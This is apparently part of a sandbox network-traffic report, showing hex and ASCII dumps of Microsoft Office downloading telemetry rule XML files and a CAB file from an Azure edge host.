                                                                                                                                                                                                                                                                                        2024-11-11 15:36:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:54 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        11192.168.2.44976413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:56 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                                                                                        Last-Modified: Sat, 09 Nov 2024 18:56:51 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DD00F04568BDCF"
                                                                                                                                                                                                                                                                                        x-ms-request-id: a2ad2bd1-f01e-0096-27d5-3310ef000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153656Z-174f7845968jrjrxhC1EWRmmrs000000059g00000000aba9
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:56 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        12192.168.2.44976513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 0eb2a1cd-301e-0020-44d5-336299000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968qj8jrhC1EWRh41s000000052000000000e0g7
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        13192.168.2.44976613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c8cfd17a-b01e-0053-1cd5-33cdf8000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968glpgnhC1EWR7uec000000059g00000000cbbr
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        14192.168.2.44976713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 45cb36d2-601e-0070-3cd5-33a0c9000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968vwdr7hC1EWRsh3w00000004z000000000r0bt
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
